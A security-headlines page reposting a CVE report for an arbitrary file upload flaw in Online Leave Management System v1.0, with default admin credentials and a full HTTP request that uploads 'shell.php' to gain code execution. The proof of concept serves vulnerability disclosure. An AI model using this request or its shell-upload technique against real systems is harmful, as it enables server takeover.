Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-41379: bug_report/RCE-1.md at main · hegeoo/bug_report

An arbitrary file upload vulnerability in the component /leave_system/classes/Users.php?f=save of Online Leave Management System v1.0 allows attackers to execute arbitrary code via a crafted PHP file.

CVE
Open in Source
#vulnerability#windows#php#auth#firefox

Permalink

Online Leave Management System v1.0 by oretnom23 has arbitrary code execution (RCE)

BUG_Author: hegeoo

Admind login account: admin/admin123

vendor: https://www.sourcecodester.com/php/14910/online-leave-management-system-php-free-source-code.html

Vulnerability url: http://ip/leave_system/classes/Users.php?f=save

Loophole location:There is an arbitrary file upload vulnerability (RCE) in the picture upload point of the “Create New” file of the “User list” module in the background management system

Request package for file upload:

POST /leave_system/classes/Users.php?f=save HTTP/1.1 Host: 192.168.1.19 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0 Accept: */* Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate DNT: 1 X-Requested-With: XMLHttpRequest Referer: http://192.168.1.19/leave_system/admin/?page=user/manage_user Content-Length: 809 Content-Type: multipart/form-data; boundary=---------------------------7128709111375 Cookie: PHPSESSID=a58hbbkeelngug4ek0dssb0rb5 Connection: close -----------------------------7128709111375 Content-Disposition: form-data; name="id" -----------------------------7128709111375 Content-Disposition: form-data; name="firstname" 111 -----------------------------7128709111375 Content-Disposition: form-data; name="lastname" 111 -----------------------------7128709111375 Content-Disposition: form-data; name="username" 111 -----------------------------7128709111375 Content-Disposition: form-data; name="password" 11 -----------------------------7128709111375 Content-Disposition: form-data; name="type" 2 -----------------------------7128709111375 Content-Disposition: form-data; name="img"; filename="shell.php" Content-Type: application/octet-stream JFJF <?php phpinfo();?> -----------------------------7128709111375–

The files will be uploaded to this directory \leave_system\uploads

We visited the directory of the file in the browser and found that the code had been executed

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE